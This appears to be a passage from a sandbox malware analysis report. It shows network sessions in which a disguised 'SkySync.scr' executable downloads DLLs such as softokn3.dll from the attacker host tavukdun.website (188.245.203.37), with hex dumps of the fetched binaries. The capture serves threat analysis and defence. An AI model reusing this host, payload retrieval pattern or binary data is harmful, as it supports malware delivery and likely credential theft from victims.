Ascii: H) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-11-01 19:58:26 UTC	16384	IN	Data Raw: 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-11-01 19:58:26 UTC	16384	IN	Data Raw: 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
2024-11-01 19:58:26 UTC	16384	IN	Data Raw: fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-11-01 19:58:26 UTC	16384	IN	Data Raw: 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.11.20	58987	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:27 UTC	243	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:28 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:27 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Friday, 01-Nov-2024 19:58:27 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-11-01 19:58:28 UTC	16124	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-11-01 19:58:28 UTC	16384	IN	Data Raw: 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 Data Ascii: -bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr
2024-11-01 19:58:28 UTC	16384	IN	Data Raw: 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-11-01 19:58:28 UTC	16384	IN	Data Raw: 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-11-01 19:58:28 UTC	16384	IN	Data Raw: 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-11-01 19:58:28 UTC	16384	IN	Data Raw: 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 Data Ascii: AUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSW
2024-11-01 19:58:28 UTC	16384	IN	Data Raw: 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 Data Ascii: E_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
2024-11-01 19:58:28 UTC	16384	IN	Data Raw: 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
2024-11-01 19:58:28 UTC	16384	IN	Data Raw: cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|i
2024-11-01 19:58:28 UTC	16384	IN	Data Raw: 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.11.20	58988	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:29 UTC	243	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:30 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:29 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Friday, 01-Nov-2024 19:58:29 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-11-01 19:58:30 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-11-01 19:58:30 UTC	16384	IN	Data Raw: 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-11-01 19:58:30 UTC	16384	IN	Data Raw: 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d Data Ascii: EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM
2024-11-01 19:58:30 UTC	16384	IN	Data Raw: 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-11-01 19:58:30 UTC	16384	IN	Data Raw: 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-11-01 19:58:30 UTC	16384	IN	Data Raw: 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 Data Ascii: ]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt
